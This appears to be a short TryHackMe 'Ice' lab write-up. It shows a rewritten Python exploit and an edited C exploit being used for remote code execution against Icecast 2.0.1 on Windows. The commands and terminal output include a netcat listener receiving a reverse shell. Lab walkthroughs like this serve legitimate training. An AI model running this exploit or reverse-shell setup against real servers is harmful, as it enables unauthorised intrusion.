Python 3 Icecast Header Overwrite buffer overflow RCE < 2.0.1 (Win32), rewritten from this Metasploit module. I rewrote this from the Metasploit module because I couldn't get this to work.
Replace the reverse shell shellcode in the exploit, then call it with the remote server and port as arguments.
root@Kali:~/TryHackme/Ice# ./icecast.py 192.168.92.133 8000
Done!
Reverse shell listener:
root@Kali:~/TryHackme/Ice# nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.92.128] from (UNKNOWN) [192.168.92.133] 49211
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Program Files (x86)\Icecast2 Win32>
Managed to get the original exploit to work. Edited according to this.
root@Kali:~/TryHackme/Ice# gcc 568-edit.c -o 568
root@Kali:~/TryHackme/Ice# ./568 192.168.92.133
Icecast <= 2.0.1 Win32 remote code execution 0.1
by Luigi Auriemma
e-mail: aluigi@altervista.org
web:http://aluigi.altervista.org
shellcode add-on by Delikon
www.delikon.de
- target 192.168.92.133:8000
- send malformed data
Server IS vulnerable!!!
On the listener:
root@Kali:~# nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.92.128] from (UNKNOWN) [192.168.92.133] 49238
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Program Files (x86)\Icecast2 Win32>